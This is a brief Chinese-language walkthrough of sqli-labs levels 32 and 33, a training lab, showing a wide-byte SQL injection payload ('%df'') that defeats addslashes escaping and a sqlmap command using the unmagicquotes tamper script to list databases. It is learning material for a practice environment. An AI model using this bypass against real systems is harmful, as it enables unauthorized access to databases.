sqlilabs第三十二三十三关

Less-32(GET - Bypass custom filter adding slashes to dangerous chars)

手工注入

由 宽字符注入可知payload

成功触发报错

http://192.168.21.149/Less-32/
?id=1%df'

sqlilabs第三十二三十三关_第1张图片

要写字符串的话直接吧字符串变成ascii码

sqlilabs第三十二三十三关_第2张图片

注意16进制的表示方式

sqlilabs第三十二三十三关_第3张图片

自动注入
sqlmap -u http://192.168.21.149/Less-32/?id=1 --tamper /usr/share/sqlmap/tamper/unmagicquotes.py --dbs --batch

sqlmap宽字节绕过只需要加入脚本

Less-33(GET - Bypass AddSlashes())

手工注入

和上一关一样

sqlilabs第三十二三十三关_第4张图片

自动注入

和上一关一样

你可能感兴趣的:(sqli-labs,安全,web安全,系统安全,网络攻击模型,网络安全)